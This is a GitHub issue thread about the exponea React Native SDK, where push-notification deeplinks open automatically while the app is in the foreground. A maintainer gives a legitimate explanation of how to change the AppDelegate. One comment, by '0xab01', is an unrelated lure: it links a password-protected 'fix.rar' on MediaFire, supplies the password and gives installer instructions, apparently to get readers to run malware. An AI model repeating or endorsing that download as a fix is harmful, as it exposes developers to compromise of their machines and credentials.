### ISSUE TITLE
setPushOpenedListener called when notification is received while app is in foreground

### ISSUE THREAD

**Issue by rada** [exponea/exponea-react-native-sdk#123]
Hi, we are using exponea-react-native-sdk v1.8.2 and RN 0.72.4.  We've followed the [documentation for push messages for iOS](https://github.com/exponea/exponea-react-native-sdk/blob/1.8.2/documentation/PUSH_IOS.md#2-exponea-app-delegate) by copying over the exponea methods (as we can't use ExponeaRNAppDelegate). 
The push messages are working fine, we are able to send and receive them however when the app is in the foreground and we receive push notification with a deeplink, the deeplink is immediately resolved and app navigates to the corresponding app section. This is all happening without any user interaction.

Can you please check if this is expected behaviour? We are also using OneSignal for push notification and the deeplink there is working as expected - navigating only after user opens the notification.

FYI - We  we're experiencing the same issue also in v1.8.0.

Let me know if you need to see the AppDelegate from our app.

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by roland-misica** [comment]
Hi @rada,
this is expected behavior when you implement AppDelegate according to the documentation. By default, notifications received when the app is in the foreground are not shown but are automatically handled as opened. you can change that behavior within your AppDelegate by changing the implementation of `application(_:didReceiveRemoteNotification:fetchCompletionHandler:),` if you suppress the call of method `[Exponea handlePushNotificationOpenedWithUserInfo:userInfo];`, then the notification will not be tracked as opened and deep links will be not resolved automatically. 
Also, this might be useful for you, if you want to show notifications when your app is in a foreground state: [Show foreground notifications](https://documentation.bloomreach.com/engagement/docs/ios-sdk-push-notifications#show-foreground-notifications)
